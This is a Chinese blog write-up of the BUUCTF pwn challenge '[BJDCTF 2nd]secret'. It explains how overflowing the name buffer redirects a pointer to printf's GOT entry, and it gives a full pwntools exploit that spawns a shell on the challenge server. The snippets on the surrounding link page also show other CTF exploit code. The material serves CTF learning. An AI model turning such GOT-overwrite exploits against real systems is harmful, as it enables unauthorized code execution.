BUUCTF(pwn)[BJDCTF 2nd]secret

最新推荐文章于 2022-05-07 09:41:20 发布
最新推荐文章于 2022-05-07 09:41:20 发布
阅读量164 收藏
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/115575451
版权

感觉这道题技巧性比较强

在这里插入图片描述
在这里插入图片描述有两次输入 一次名字,一次 密码

在这里插入图片描述
先进 46A3AF

在这里插入图片描述
这里有一次输入 name

看一下 0x40136D的汇编

在这里插入图片描述这里每次有一次 调用 0x46A329,并且 有一次cmp比较; 那么进入 0x46a329

在这里插入图片描述
进去看看0x401301
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
发现 printf_plt 的位置 与 system的位置相差0x10即16
我们可以一开始输入name的时候输入bin/sh; 把0x46d090覆盖为printf_plt,
经过16次输入比较, 前15次输入对的,最后一次输入错误的,使地址偏移为 system,
得到flag;

在这里插入图片描述思路

输入name 为 bin/sh
修改off_46D090, 为printf_got。
答对15次,答错一次刚好16次即0x10
使得printf_got指向system

from pwn import *

p = remote('node3.buuoj.cn',26671)

elf = ELF('./2')

printf_got=elf.got['printf']

keys=[0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]

payload='/bin/sh\x00'.ljust(0x10,'a')+p32(printf_got)

p.sendlineafter("What's your name?",payload)

for a in keys:

	p.sendlineafter('Secret:',str(a))

p.sendlineafter('Secret:','1')

p.interactive()
半岛铁盒@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-RSA 技巧总结
cxiaodi的博客
02-06 1323
CTF-RSA 技巧总结
攻防世界pwn新手练习区通关教程
锋刃科技的博客
05-19 3712
when_did_you_born 我们通过溢出来覆盖v5为1926即可 代码块 from pwn import * r = remote("124.126.19.106",31534) payload = 'a'* (0x20-0x18) +p64(1926) r.recvuntil("What's Your Birth?\n") r.sendline("2000") r.recvuntil("What's Your Name?\n") r.sendline(payload) print r.re
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 397
buuctf-pwn 001-016题wp
buuctf——SecretFile
qq_51796436的博客
03-05 936
进来就看见有大佬被挂在黑页 F12查看源码看到在下面有个黑化了的标签藏得挺深,./Archive_room.php。然后网页中间有个 不知道的还以为在FBI warning.点进去看看,注意到直接来到了end.php,但是在上一页的源码这个secret的herf是跳转至action.php啊。应该是action.php302跳转到了end.php吧,开burp看看 事实证明确实有action.php repeater发包后在响应包看到有secr3t.php,拿到题目源码: <html>
BUUCTF】[CISCN2019 华东南赛区]Double Secret
aoao331198的博客
04-22 1829
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
BUUCTF(PWN)suctf_2018_stack
半岛铁盒的博客
04-03 275
from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐 ...
buuctf [极客大挑战 2019]Secret File 1
hintll的博客
06-14 348
[极客大挑战 2019]Secret File 1 打开以后: 老规矩,直接看源码: 看到第27行 有个提示文件 直接访问: 点一下secret 让我回去仔细看看: 回去再看一遍源码 还是没有提示 可能是页面跳转太快 那就抓个包看看: 既然是跳转快,那就重新发送有个 然后看看它的回应包: 这个回应包里面有一个提示文件 那就直接访问一下试试: 有一个备注:flag放在flag.php里面 那就访问这个flag.php 它说看不到它 那就看看源代码 也没有 那应该是它不可以读这个文件 那这题可能是考察php伪协
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1535
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
[BUUCTF-pwn]——[BJDCTF 2nd]r2t4
Y_peak的博客
02-22 177
[BUUCTF-pwn]——[BJDCTF 2nd]r2t4 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]r2t4 checksec一下,看一下。 IDA中,发现了后面函数和格式化字符串漏洞。 找到后门函数的地址, 并且算格式化字符串的偏移 思路 开启了canary保护,我们想要执行我们想要执行的代码, 可以通过触发canary保护, 进而触发__stack_chk_fail函数,执行。我们将got表地址改为我们想要执行的地址就可以了。 fm
buuoj pwn get_started_3dsctf_2016 ret2syscall
yongbaoii的博客
01-29 356
这里记录的是ret2syscall时候出的一些状况,详细的完整版在下面链接 from pwn import * r = process('./2016') elf=ELF('./2016') context.log_level = "debug" bss=0x080eb000 pop_ebx_esi_edi_ret=0x080509a5 syscall_addr = 0x0806357d pop_eax = 0x080b91e6 bss_addr = 0x080eb000 #gdb.attach(r)
Buuctfpwn
qq_53809201的博客
05-07 664
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 404
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目write up
hhhhhhhhh85的博客
09-29 4752
2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目wpweb1 adminloginweb2 ezphpmisc1 extractallmisc2 认真你就输了crypto1 rsa17crypto2 移位凯撒reverse ezgopwn ez_rop 线上测试赛,两个多小时8道题做出来5道,感觉自己还是太菜,简单记录一下。能down下来的东西都在最后百度云链接里。 web1 adminlogin 扫描得到admin.php 得到登录页面,根据提示flag在数据库里,推测是sql注入。 试了一下
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 665
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值